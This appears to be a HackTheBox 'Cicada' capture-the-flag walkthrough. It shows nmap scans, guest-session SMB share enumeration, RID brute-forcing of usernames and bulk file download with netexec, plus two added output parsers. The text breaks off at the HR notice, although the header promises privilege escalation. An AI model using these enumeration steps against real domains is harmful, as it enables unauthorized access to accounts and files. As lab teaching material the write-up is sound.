HackTheBox: Cicada — Easy (Windows)

Full security assessment walkthrough for Cicada on HackTheBox. Includes reconnaissance, enumeration, exploitation steps, and a professional penetration testing report with CVSS v3.1 scores and remediation guidance.

lazyhackers · Mar 26, 2026 · 1 min read
Cicada · HackTheBox · Windows · Easy

🔖 Techniques & Vulnerabilities

SMB Misconfiguration, Default Password, User Descriptions, SeBackupPrivilege, Pass the Hash, PtH, rce, pass-the-hash, sudo, bloodhound, idor

🔍 Reconnaissance / Port Scanning

nmap scan
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV 10.129.180.249
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 13:36 CEST
Nmap scan report for 10.129.180.249
Host is up (0.014s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-09-29 18:36:15Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-09-29T18:36:56
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 7h00m00s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 91.68 seconds

🎯 Attack Surface Analysis

Port        Service         Version / Banner
53/tcp      domain          Simple DNS Plus
88/tcp      kerberos-sec    Microsoft Windows Kerberos (server time: 2024-09-29 18:36:15Z)
123/udp     ntp             NTP v3
135/tcp     msrpc           Microsoft Windows RPC
139/tcp     netbios-ssn     Microsoft Windows netbios-ssn
389/tcp     ldap            Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
445/tcp     microsoft-ds?
464/tcp     kpasswd5?
593/tcp     ncacn_http      Microsoft Windows RPC over HTTP 1.0
636/tcp     ssl/ldap        Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
3268/tcp    ldap            Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
3269/tcp    ssl/ldap        Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
5985/tcp    http            Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
62484/tcp   msrpc           Microsoft Windows RPC
53/tcp (DNS)
  • Zone transfer (AXFR) reveals all DNS records if permitted
  • Subdomain brute-force to discover hidden services and admin panels
  • Reverse lookup enumeration to map IP ranges to hostnames
  • DNS cache poisoning on vulnerable resolvers
88/tcp (Kerberos)
  • AS-REP Roasting — pre-auth disabled accounts yield tickets for offline cracking
  • Kerberoasting — SPN accounts yield TGS tickets for offline cracking
  • Golden Ticket — KRBTGT hash enables forging unrestricted domain access tickets
  • Silver Ticket — service account hash enables forging service-specific tickets
  • Pass-the-Ticket — inject valid tickets from memory to authenticate as another user
  • Kerberos delegation abuse — unconstrained or misconfigured constrained delegation
123/udp (NTP)
  • Enumerate service version for known CVEs
  • Test default/weak credentials
  • Review protocol-specific attack techniques
135/tcp (MSRPC)
  • RPC endpoint enumeration maps registered services and interfaces
  • DCOM lateral movement via Component Object Model
  • WMI remote execution with valid credentials
  • PrintSpooler (MS-RPRN) abuse coerces NTLM authentication
139/tcp (NetBIOS-SMB)
  • Null session enumeration of users, shares, and domain info
  • SMBv1 exploitation — EternalBlue (MS17-010) on unpatched systems
  • NTLM relay — captured auth relayed to other services
  • Credential brute-force against SMB authentication
389/tcp (LDAP)
  • Anonymous bind — unauthenticated enumeration of all AD objects
  • Password policy retrieval for informed brute-force strategy
  • BloodHound collection for AD attack path analysis
  • LDAP injection in web applications building directory queries from user input
445/tcp (SMB)
  • Share enumeration — scripts, configs, credentials in accessible shares
  • EternalBlue (MS17-010) — unauthenticated RCE on unpatched SMBv1 systems
  • NTLM relay attack — authentication coercion for lateral movement
  • Pass-the-Hash — NTLM hash authenticates without plaintext password
  • Credential brute-force and password spraying
593/tcp (ncacn_http)
  • Enumerate service version for known CVEs
  • Test default/weak credentials
  • Review protocol-specific attack techniques
636/tcp (LDAPS)
  • All LDAP attack vectors over encrypted channel
  • Client certificate authentication testing
3268/tcp (ldap)
  • Enumerate service version for known CVEs
  • Test default/weak credentials
  • Review protocol-specific attack techniques
3269/tcp (ssl/ldap)
  • Enumerate service version for known CVEs
  • Test default/weak credentials
  • Review protocol-specific attack techniques
5985/tcp (WinRM)
  • Valid credentials grant PowerShell remoting (Evil-WinRM)
  • Pass-the-Hash — NTLM hash authenticates without cleartext password
  • Token impersonation from elevated WinRM sessions
62484/tcp (msrpc)
  • Enumerate service version for known CVEs
  • Test default/weak credentials
  • Review protocol-specific attack techniques

📖 Walkthrough

Reconnaissance

Port Scanning

We performed the usual port scans (default TCP ports, the full TCP range, and UDP) so as not to miss anything, but the open ports were the standard set for a Windows box.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV 10.129.180.249
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 13:36 CEST
Nmap scan report for 10.129.180.249
Host is up (0.014s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-09-29 18:36:15Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-09-29T18:36:56
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 7h00m00s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 91.68 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -p- 10.129.180.249
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 13:37 CEST
Nmap scan report for 10.129.180.249
Host is up (0.013s latency).
Not shown: 65522 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-09-29 18:40:20Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
62484/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-09-29T18:41:11
|_  start_date: N/A
|_clock-skew: 7h00m00s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 237.20 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV -sU 10.129.180.249
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 13:46 CEST
Nmap scan report for 10.129.180.249
Host is up (0.020s latency).
Not shown: 997 open|filtered udp ports (no-response)
PORT    STATE SERVICE      VERSION
53/udp  open  domain       Simple DNS Plus
88/udp  open  kerberos-sec Microsoft Windows Kerberos (server time: 2024-09-29 18:46:09Z)
123/udp open  ntp          NTP v3
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 5079.49 seconds

We added cicada.htb and CICADA-DC.cicada.htb to our /etc/hosts file.

┌──(kali㉿kali)-[~]
└─$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
10.129.180.249  cicada.htb
10.129.180.249  CICADA-DC.cicada.htb

Enumeration of Port 445/TCP

Since there was no website, we started by enumerating port 445/TCP. A null session was rejected, but the guest account with an empty password was accepted and could read IPC$ and HR without any valid credentials.

┌──(kali㉿kali)-[~]
└─$ netexec smb 10.129.180.249 -u '' -p '' --shares 
SMB         10.129.180.249  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.180.249  445    CICADA-DC        [+] cicada.htb\: 
SMB         10.129.180.249  445    CICADA-DC        [-] Error enumerating shares: STATUS_ACCESS_DENIED
┌──(kali㉿kali)-[~]
└─$ netexec smb 10.129.180.249 -u ' ' -p ' ' --shares
SMB         10.129.180.249  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.180.249  445    CICADA-DC        [+] cicada.htb\ :  
SMB         10.129.180.249  445    CICADA-DC        [-] Error enumerating shares: STATUS_ACCESS_DENIED
┌──(kali㉿kali)-[~]
└─$ netexec smb 10.129.180.249 -u 'guest' -p '' --shares   
SMB         10.129.180.249  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.180.249  445    CICADA-DC        [+] cicada.htb\guest: 
SMB         10.129.180.249  445    CICADA-DC        [*] Enumerated shares
SMB         10.129.180.249  445    CICADA-DC        Share           Permissions     Remark
SMB         10.129.180.249  445    CICADA-DC        -----           -----------     ------
SMB         10.129.180.249  445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.129.180.249  445    CICADA-DC        C$                              Default share
SMB         10.129.180.249  445    CICADA-DC        DEV                             
SMB         10.129.180.249  445    CICADA-DC        HR              READ            
SMB         10.129.180.249  445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.129.180.249  445    CICADA-DC        NETLOGON                        Logon server share 
SMB         10.129.180.249  445    CICADA-DC        SYSVOL                          Logon server share
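As an added example (not part of the original write-up), here is a small Python parser for the netexec `--shares` output above. It pulls the session identity and the share table out of the log lines and flags the non-default shares the guest session could read, which is the item a defender would want in a finding. The sample log is copied from the listing above and embedded so the script runs offline; the 16-character column width and the default-share list are assumptions of this example.

```python
import re
from dataclasses import dataclass
from typing import List

# One netexec SMB log line: "SMB  <ip>  <port>  <host>  <payload>"
NXC_LINE = re.compile(r"^SMB\s+(?P<ip>\S+)\s+(?P<port>\d+)\s+(?P<host>\S+)\s+(?P<payload>.*)$")
PERMISSIONS = {"READ", "WRITE", "READ,WRITE"}
# Shares a Windows host / domain controller exposes by default (assumption of this example)
DEFAULT_SHARES = {"ADMIN$", "C$", "IPC$", "NETLOGON", "SYSVOL", "PRINT$"}

# Constructed sample: the guest-session share listing from this write-up.
SAMPLE_SHARES_OUTPUT = """\
SMB         10.129.180.249  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.180.249  445    CICADA-DC        [+] cicada.htb\\guest:
SMB         10.129.180.249  445    CICADA-DC        [*] Enumerated shares
SMB         10.129.180.249  445    CICADA-DC        Share           Permissions     Remark
SMB         10.129.180.249  445    CICADA-DC        -----           -----------     ------
SMB         10.129.180.249  445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.129.180.249  445    CICADA-DC        C$                              Default share
SMB         10.129.180.249  445    CICADA-DC        DEV
SMB         10.129.180.249  445    CICADA-DC        HR              READ
SMB         10.129.180.249  445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.129.180.249  445    CICADA-DC        NETLOGON                        Logon server share
SMB         10.129.180.249  445    CICADA-DC        SYSVOL                          Logon server share
"""


@dataclass
class Share:
    name: str
    permissions: str  # "" when the session has no access
    remark: str


@dataclass
class ShareListing:
    host: str
    identity: str  # e.g. "cicada.htb\\guest"
    shares: List[Share]


def parse_share_listing(text: str) -> ShareListing:
    """Extract host, authenticated identity and the share table from netexec output."""
    host, identity, shares = "", "", []
    in_table = False
    for raw in text.splitlines():
        m = NXC_LINE.match(raw)
        if not m:
            continue
        host, payload = m.group("host"), m.group("payload")
        if payload.startswith("[+] "):
            # "[+] cicada.htb\guest:" -> identity is everything before the last ':'
            identity = payload[4:].rsplit(":", 1)[0].strip()
            continue
        if payload.startswith("[*] Enumerated shares"):
            in_table = True
            continue
        if not in_table or payload.startswith(("Share ", "-----")):
            continue
        # netexec prints the table as three 16-character-wide columns
        name, perms, remark = payload[:16].strip(), payload[16:32].strip(), payload[32:].strip()
        if perms and perms not in PERMISSIONS:
            # defensive: an unexpected second column is part of the remark, not a permission
            remark, perms = (perms + " " + remark).strip(), ""
        if name:
            shares.append(Share(name, perms, remark))
    return ShareListing(host, identity, shares)


def readable_shares(listing: ShareListing) -> List[str]:
    return [s.name for s in listing.shares if "READ" in s.permissions]


def exposed_non_default_shares(listing: ShareListing) -> List[str]:
    """Readable shares that Windows does not create itself: the ones worth a finding for a guest session."""
    return [s.name for s in listing.shares
            if "READ" in s.permissions and s.name.upper() not in DEFAULT_SHARES]


def main() -> None:
    listing = parse_share_listing(SAMPLE_SHARES_OUTPUT)
    print(f"{listing.host}: session as {listing.identity}")
    for share in listing.shares:
        print(f"  {share.name:<10} {share.permissions or '-':<10} {share.remark}")
    print("readable:", readable_shares(listing))
    print("non-default shares readable by this identity:", exposed_non_default_shares(listing))


if __name__ == "__main__":
    main()
```

Feeding the later `--shares` run as david.orelious through the same parser would list DEV, HR, NETLOGON and SYSVOL as readable, and the non-default set would grow to DEV and HR; comparing the guest result against the authenticated result is a quick way to separate "guest enabled" from "share ACL too open".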

RID Brute Forcing

We then performed RID brute forcing over the same guest session to extract a set of usernames.

┌──(kali㉿kali)-[~]
└─$ netexec smb 10.129.180.249 -u 'guest' -p '' --rid-brute
SMB         10.129.180.249  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.180.249  445    CICADA-DC        [+] cicada.htb\guest: 
SMB         10.129.180.249  445    CICADA-DC        498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.180.249  445    CICADA-DC        500: CICADA\Administrator (SidTypeUser)
SMB         10.129.180.249  445    CICADA-DC        501: CICADA\Guest (SidTypeUser)
SMB         10.129.180.249  445    CICADA-DC        502: CICADA\krbtgt (SidTypeUser)
SMB         10.129.180.249  445    CICADA-DC        512: CICADA\Domain Admins (SidTypeGroup)
SMB         10.129.180.249  445    CICADA-DC        513: CICADA\Domain Users (SidTypeGroup)
SMB         10.129.180.249  445    CICADA-DC        514: CICADA\Domain Guests (SidTypeGroup)
SMB         10.129.180.249  445    CICADA-DC        515: CICADA\Domain Computers (SidTypeGroup)
SMB         10.129.180.249  445    CICADA-DC        516: CICADA\Domain Controllers (SidTypeGroup)
SMB         10.129.180.249  445    CICADA-DC        517: CICADA\Cert Publishers (SidTypeAlias)
SMB         10.129.180.249  445    CICADA-DC        518: CICADA\Schema Admins (SidTypeGroup)
SMB         10.129.180.249  445    CICADA-DC        519: CICADA\Enterprise Admins (SidTypeGroup)
SMB         10.129.180.249  445    CICADA-DC        520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB         10.129.180.249  445    CICADA-DC        521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.180.249  445    CICADA-DC        522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.129.180.249  445    CICADA-DC        525: CICADA\Protected Users (SidTypeGroup)
SMB         10.129.180.249  445    CICADA-DC        526: CICADA\Key Admins (SidTypeGroup)
SMB         10.129.180.249  445    CICADA-DC        527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB         10.129.180.249  445    CICADA-DC        553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB         10.129.180.249  445    CICADA-DC        571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.129.180.249  445    CICADA-DC        572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.129.180.249  445    CICADA-DC        1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB         10.129.180.249  445    CICADA-DC        1101: CICADA\DnsAdmins (SidTypeAlias)
SMB         10.129.180.249  445    CICADA-DC        1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB         10.129.180.249  445    CICADA-DC        1103: CICADA\Groups (SidTypeGroup)
SMB         10.129.180.249  445    CICADA-DC        1104: CICADA\john.smoulder (SidTypeUser)
SMB         10.129.180.249  445    CICADA-DC        1105: CICADA\sarah.dantelia (SidTypeUser)
SMB         10.129.180.249  445    CICADA-DC        1106: CICADA\michael.wrightson (SidTypeUser)
SMB         10.129.180.249  445    CICADA-DC        1108: CICADA\david.orelious (SidTypeUser)
SMB         10.129.180.249  445    CICADA-DC        1109: CICADA\Dev Support (SidTypeGroup)
SMB         10.129.180.249  445    CICADA-DC        1601: CICADA\emily.oscars (SidTypeUser)
Username
  • support
  • administrator
  • john.smoulder
  • sarah.dantelia
  • michael.wrightson
  • david.orelious
  • emily.oscars
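Added example, not from the original write-up: a parser for the `--rid-brute` output above that turns each line into a structured record (RID, domain, name, SID type). The same data that produced the username list also tells a reader which entries are machine accounts and which groups the organisation created itself (RID 1000 and up). The sample is a subset of the listing above, copied here so the script runs offline; the RID threshold and the machine-account convention (name ending in `$`) are assumptions of this example.

```python
import re
from dataclasses import dataclass
from typing import List

# "<rid>: <DOMAIN>\<name> (SidTypeUser|SidTypeGroup|SidTypeAlias)" after the netexec prefix
RID_LINE = re.compile(
    r"^SMB\s+\S+\s+\d+\s+\S+\s+(?P<rid>\d+):\s+(?P<domain>[^\\]+)\\(?P<name>.+?)\s+\((?P<kind>SidType\w+)\)\s*$"
)

# Constructed sample: a subset of the --rid-brute output shown in this write-up.
SAMPLE_RID_OUTPUT = """\
SMB         10.129.180.249  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.180.249  445    CICADA-DC        [+] cicada.htb\\guest:
SMB         10.129.180.249  445    CICADA-DC        498: CICADA\\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.180.249  445    CICADA-DC        500: CICADA\\Administrator (SidTypeUser)
SMB         10.129.180.249  445    CICADA-DC        501: CICADA\\Guest (SidTypeUser)
SMB         10.129.180.249  445    CICADA-DC        502: CICADA\\krbtgt (SidTypeUser)
SMB         10.129.180.249  445    CICADA-DC        512: CICADA\\Domain Admins (SidTypeGroup)
SMB         10.129.180.249  445    CICADA-DC        513: CICADA\\Domain Users (SidTypeGroup)
SMB         10.129.180.249  445    CICADA-DC        1000: CICADA\\CICADA-DC$ (SidTypeUser)
SMB         10.129.180.249  445    CICADA-DC        1103: CICADA\\Groups (SidTypeGroup)
SMB         10.129.180.249  445    CICADA-DC        1104: CICADA\\john.smoulder (SidTypeUser)
SMB         10.129.180.249  445    CICADA-DC        1105: CICADA\\sarah.dantelia (SidTypeUser)
SMB         10.129.180.249  445    CICADA-DC        1106: CICADA\\michael.wrightson (SidTypeUser)
SMB         10.129.180.249  445    CICADA-DC        1108: CICADA\\david.orelious (SidTypeUser)
SMB         10.129.180.249  445    CICADA-DC        1109: CICADA\\Dev Support (SidTypeGroup)
SMB         10.129.180.249  445    CICADA-DC        1601: CICADA\\emily.oscars (SidTypeUser)
"""


@dataclass
class RidEntry:
    rid: int
    domain: str
    name: str
    kind: str  # SidTypeUser, SidTypeGroup or SidTypeAlias


def parse_rid_brute(text: str) -> List[RidEntry]:
    """Keep only the enumerated SID lines; banner and login lines do not match RID_LINE."""
    entries = []
    for line in text.splitlines():
        m = RID_LINE.match(line)
        if m:
            entries.append(RidEntry(int(m.group("rid")), m.group("domain"), m.group("name"), m.group("kind")))
    return entries


def domain_users(entries: List[RidEntry], include_machine_accounts: bool = False) -> List[str]:
    """User principals in RID order, lower-cased; machine accounts ('$' suffix) dropped by default."""
    return [e.name.lower() for e in entries
            if e.kind == "SidTypeUser" and (include_machine_accounts or not e.name.endswith("$"))]


def machine_accounts(entries: List[RidEntry]) -> List[str]:
    return [e.name for e in entries if e.kind == "SidTypeUser" and e.name.endswith("$")]


def custom_groups(entries: List[RidEntry]) -> List[str]:
    """Groups and aliases with RID >= 1000 were created by the organisation, not by Windows."""
    return [e.name for e in entries if e.kind in ("SidTypeGroup", "SidTypeAlias") and e.rid >= 1000]


def main() -> None:
    entries = parse_rid_brute(SAMPLE_RID_OUTPUT)
    print("users:          ", domain_users(entries))
    print("machine accounts:", machine_accounts(entries))
    print("custom groups:  ", custom_groups(entries))


if __name__ == "__main__":
    main()
```

From a defensive angle the interesting output is not the user list but the fact that it was obtainable at all: RID cycling over a guest session is a symptom of the guest account being enabled, and the enumerated custom groups (here Groups and Dev Support) are the ones whose membership and share permissions deserve review.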

Investigating HR Share

Next up, we took a look at the HR share, which the guest session could also read.

┌──(kali㉿kali)-[~]
└─$ netexec smb 10.129.180.249 -u 'guest' -p '' --shares -M spider_plus -o DOWNLOAD_FLAG=true
SMB         10.129.180.249  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.180.249  445    CICADA-DC        [+] cicada.htb\guest: 
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*]  DOWNLOAD_FLAG: True
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*]     STATS_FLAG: True
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*]  OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus
SMB         10.129.180.249  445    CICADA-DC        [*] Enumerated shares
SMB         10.129.180.249  445    CICADA-DC        Share           Permissions     Remark
SMB         10.129.180.249  445    CICADA-DC        -----           -----------     ------
SMB         10.129.180.249  445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.129.180.249  445    CICADA-DC        C$                              Default share
SMB         10.129.180.249  445    CICADA-DC        DEV                             
SMB         10.129.180.249  445    CICADA-DC        HR              READ            
SMB         10.129.180.249  445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.129.180.249  445    CICADA-DC        NETLOGON                        Logon server share 
SMB         10.129.180.249  445    CICADA-DC        SYSVOL                          Logon server share 
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [+] Saved share-file metadata to "/tmp/nxc_hosted/nxc_spider_plus/10.129.180.249.json".
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*] SMB Shares:           7 (ADMIN$, C$, DEV, HR, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*] SMB Readable Shares:  2 (HR, IPC$)
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*] SMB Filtered Shares:  1
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*] Total folders found:  0
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*] Total files found:    1
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*] File size average:    1.24 KB
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*] File size min:        1.24 KB
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*] File size max:        1.24 KB
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*] File unique exts:     1 (.txt)
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*] Downloads successful: 1
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [+] All files processed successfully.

Inside the share we found a file named Notice from HR.txt, which contained the default password handed to new hires.

┌──(kali㉿kali)-[/media/…/HTB/Machines/Cicada/files]
└─$ cat Notice\ from\ HR.txt 

Dear new hire!

